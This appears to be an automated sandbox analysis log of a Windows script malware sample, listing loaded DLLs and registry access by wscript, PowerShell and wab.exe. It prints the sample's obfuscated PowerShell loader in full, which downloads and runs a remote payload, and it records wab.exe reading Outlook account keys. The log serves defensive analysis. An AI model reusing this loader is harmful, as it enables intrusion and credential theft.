                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbY source: powershell.exe, 00000005.00000002.1767599813.00000000072AD000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbv source: powershell.exe, 00000005.00000002.1767599813.00000000072AD000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1767599813.000000000726E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: m.Core.pdbD source: powershell.exe, 00000005.00000002.1767599813.00000000072AD000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrst", "0")
                Source: Yara matchFile source: 00000005.00000002.1770777282.0000000008F9F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1770345061.0000000008770000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1765124979.0000000005C63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1881945266.00000258F5F75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Dragen)$global:Thetarytme = [System.Text.Encoding]::ASCII.GetString($Earthshine)$global:Dampskibsforbindelsers=$Thetarytme.substring($Cafeterieejerne,$Unoccupiedness111)<#Cacodaemon
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Tetrads $Ankeinstansensrbejdsdatabasernesiobrndsler $Sniggle), (Uncomplementary @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Skolebordets = [AppDomain]:
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($rekvisitren)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Noncontemptuous91, $false).DefineType($Situat
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Dragen)$global:Thetarytme = [System.Text.Encoding]::ASCII.GetString($Earthshine)$global:Dampskibsforbindelsers=$Thetarytme.substring($Cafeterieejerne,$Unoccupiedness111)<#Cacodaemon
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo';If (${host}.CurrentCulture) {$Banderillero++;}Function Mashlin($Corban){$Goosing=$Corban.Length-$Banderillero;$Solubilities180='SUBsTRI';$Solubilities180+='ng';For( $aflvningsmiddels=7;$aflvningsmiddels -lt $Goosing;$aflvningsmiddels+=8){$Viljestrk+=$Corban.$Solubilities180.Invoke( $aflvningsmiddels, $Banderillero);}$Viljestrk;}function Catholicate($Lyncine){ . ($Svinske25) ($Lyncine);}$Sikhens=Mashlin ' RugenbMItalienoKdery,ezBefugteiPh,tololFhovedel.udgerealserund/Koasuta5 Bribeg.Clearhe0Underud Lolansp(kamgavlWMawingriOverfo.n Overp dGnarredoopportuw.ahabeas Preemp Ant nagNEf.erspT Preter Blinde1Utaalmo0Parkeri.Fontina0E rthin; onabso .ortidsWf iktioiG,uppeanNonconc6Aracari4 Abbots;R aensb Trinervx Moni,o6Observ.4 Brepil;Sognefo Cyc,otrH.lautov Lssene:Polyes.1Prkener2 Allahc1jongl,r. Reinco0 Deduct)Gleaned T easurGkautionePoli urc Tpdherk Sukkerocarpopo/Fa litt2Gordyfy0Desilve1 Langpl0Coconsc0Senatus1Parapla0Mercify1 tartb Underb,FOverhrti Religirmodulate Statssf ChieftoBortforxLogfile/ Unclin1Flyttel2Nepotis1Bverr t.Dis ppo0Sammens ';$Sensationer=Mashlin 'SolingkUCell.resSkybrude,nshakerScandal- CentimAp,eoccugParad.ne LimphanEffluent Pla.tp ';$Unclipper=Mashlin ' SkrifthSk.lepat vangsftOverextp Snren :Digebru/ Brugsv/Stenion1sandema0 K mmar3Drikkes.Talioni2Sacr me3General7postco,.V,relag8E,cyoff6elfenbe.Adfrds.2Mijn,ee4Colorif7Semiana/SkrigedDTaksatiaSprogbrg Succ.dustilleveIverensrAgrafedr.ehndige TusindoDeaminatj,nerelyBequotep Atriumi FrownsePushilyrM usehanSarinoseaabentvsNoug,te.CockpitfM,slinglW.istwaakuratel ';$Gesjftigstes=Mashlin '.acemak>Coglori ';$Svinske25=Mashlin ' U,ilisiSundhedeMedmennxPr,stit ';$Bmw='Byguerillaernes';$Anskaffedes = Mashlin 'Isblokke Opht.acMadnesshPryglero Dep le Prevari%H ircapaSuggestpCivilbepFrbaadedGuldfataindm,dstOvergloaFarve.r%Fuldebd\BunddkkRgemmedmePreinven Shi kioIntensiwFo,staanEuroomre.nstrukrA.ylate.Manged S Rds,lsuBuf,erenUdlgger Sterr.t&Barna,t&Usselve WhissleeWrassesc,loweryhInkstonoLi,uori Lys,pritSko are ';Catholicate (Mashlin 'Obs.etr$GasbagggUnpleaslMediat.o ViniesbOutplacaUd ullelPharmac:.aferwohRefu,biaMek.niss.lveaartMe struiSkorstegSvengalhGatedhaeNonfecudkrigsspeSydste.rVariabe=Kontoku(Hallucic Su fitmBlackbudSkresta Undece/VerdenscFarmin, Hordeol$E,rwigsAsnep,ovn Disnums elikatkF,ortenaBahamanfEjerbolf NyligeeChastendSot
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo';If (${host}.CurrentCulture) {$Banderillero++;}Function Mashlin($Corban){$Goosing=$Corban.Length-$Banderillero;$Solubilities180='SUBsTRI';$Solubilities180+='ng';For( $aflvningsmiddels=7;$aflvningsmiddels -lt $Goosing;$aflvningsmiddels+=8){$Viljestrk+=$Corban.$Solubilities180.Invoke( $aflvningsmiddels, $Banderillero);}$Viljestrk;}function Catholicate($Lyncine){ . ($Svinske25) ($Lyncine);}$Sikhens=Mashlin ' RugenbMItalienoKdery,ezBefugteiPh,tololFhovedel.udgerealserund/Koasuta5 Bribeg.Clearhe0Underud Lolansp(kamgavlWMawingriOverfo.n Overp dGnarredoopportuw.ahabeas Preemp Ant nagNEf.erspT Preter Blinde1Utaalmo0Parkeri.Fontina0E rthin; onabso .ortidsWf iktioiG,uppeanNonconc6Aracari4 Abbots;R aensb Trinervx Moni,o6Observ.4 Brepil;Sognefo Cyc,otrH.lautov Lssene:Polyes.1Prkener2 Allahc1jongl,r. Reinco0 Deduct)Gleaned T easurGkautionePoli urc Tpdherk Sukkerocarpopo/Fa litt2Gordyfy0Desilve1 Langpl0Coconsc0Senatus1Parapla0Mercify1 tartb Underb,FOverhrti Religirmodulate Statssf ChieftoBortforxLogfile/ Unclin1Flyttel2Nepotis1Bverr t.Dis ppo0Sammens ';$Sensationer=Mashlin 'SolingkUCell.resSkybrude,nshakerScandal- CentimAp,eoccugParad.ne LimphanEffluent Pla.tp ';$Unclipper=Mashlin ' SkrifthSk.lepat vangsftOverextp Snren :Digebru/ Brugsv/Stenion1sandema0 K mmar3Drikkes.Talioni2Sacr me3General7postco,.V,relag8E,cyoff6elfenbe.Adfrds.2Mijn,ee4Colorif7Semiana/SkrigedDTaksatiaSprogbrg Succ.dustilleveIverensrAgrafedr.ehndige TusindoDeaminatj,nerelyBequotep Atriumi FrownsePushilyrM usehanSarinoseaabentvsNoug,te.CockpitfM,slinglW.istwaakuratel ';$Gesjftigstes=Mashlin '.acemak>Coglori ';$Svinske25=Mashlin ' U,ilisiSundhedeMedmennxPr,stit ';$Bmw='Byguerillaernes';$Anskaffedes = Mashlin 'Isblokke Opht.acMadnesshPryglero Dep le Prevari%H ircapaSuggestpCivilbepFrbaadedGuldfataindm,dstOvergloaFarve.r%Fuldebd\BunddkkRgemmedmePreinven Shi kioIntensiwFo,staanEuroomre.nstrukrA.ylate.Manged S Rds,lsuBuf,erenUdlgger Sterr.t&Barna,t&Usselve WhissleeWrassesc,loweryhInkstonoLi,uori Lys,pritSko are ';Catholicate (Mashlin 'Obs.etr$GasbagggUnpleaslMediat.o ViniesbOutplacaUd ullelPharmac:.aferwohRefu,biaMek.niss.lveaartMe struiSkorstegSvengalhGatedhaeNonfecudkrigsspeSydste.rVariabe=Kontoku(Hallucic Su fitmBlackbudSkresta Undece/VerdenscFarmin, Hordeol$E,rwigsAsnep,ovn Disnums elikatkF,ortenaBahamanfEjerbolf NyligeeChastendSot
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo';If (${host}.CurrentCulture) {$Banderillero++;}Function Mashlin($Corban){$Goosing=$Corban.Length-$Banderillero;$Solubilities180='SUBsTRI';$Solubilities180+='ng';For( $aflvningsmiddels=7;$aflvningsmiddels -lt $Goosing;$aflvningsmiddels+=8){$Viljestrk+=$Corban.$Solubilities180.Invoke( $aflvningsmiddels, $Banderillero);}$Viljestrk;}function Catholicate($Lyncine){ . ($Svinske25) ($Lyncine);}$Sikhens=Mashlin ' RugenbMItalienoKdery,ezBefugteiPh,tololFhovedel.udgerealserund/Koasuta5 Bribeg.Clearhe0Underud Lolansp(kamgavlWMawingriOverfo.n Overp dGnarredoopportuw.ahabeas Preemp Ant nagNEf.erspT Preter Blinde1Utaalmo0Parkeri.Fontina0E rthin; onabso .ortidsWf iktioiG,uppeanNonconc6Aracari4 Abbots;R aensb Trinervx Moni,o6Observ.4 Brepil;Sognefo Cyc,otrH.lautov Lssene:Polyes.1Prkener2 Allahc1jongl,r. Reinco0 Deduct)Gleaned T easurGkautionePoli urc Tpdherk Sukkerocarpopo/Fa litt2Gordyfy0Desilve1 Langpl0Coconsc0Senatus1Parapla0Mercify1 tartb Underb,FOverhrti Religirmodulate Statssf ChieftoBortforxLogfile/ Unclin1Flyttel2Nepotis1Bverr t.Dis ppo0Sammens ';$Sensationer=Mashlin 'SolingkUCell.resSkybrude,nshakerScandal- CentimAp,eoccugParad.ne LimphanEffluent Pla.tp ';$Unclipper=Mashlin ' SkrifthSk.lepat vangsftOverextp Snren :Digebru/ Brugsv/Stenion1sandema0 K mmar3Drikkes.Talioni2Sacr me3General7postco,.V,relag8E,cyoff6elfenbe.Adfrds.2Mijn,ee4Colorif7Semiana/SkrigedDTaksatiaSprogbrg Succ.dustilleveIverensrAgrafedr.ehndige TusindoDeaminatj,nerelyBequotep Atriumi FrownsePushilyrM usehanSarinoseaabentvsNoug,te.CockpitfM,slinglW.istwaakuratel ';$Gesjftigstes=Mashlin '.acemak>Coglori ';$Svinske25=Mashlin ' U,ilisiSundhedeMedmennxPr,stit ';$Bmw='Byguerillaernes';$Anskaffedes = Mashlin 'Isblokke Opht.acMadnesshPryglero Dep le Prevari%H 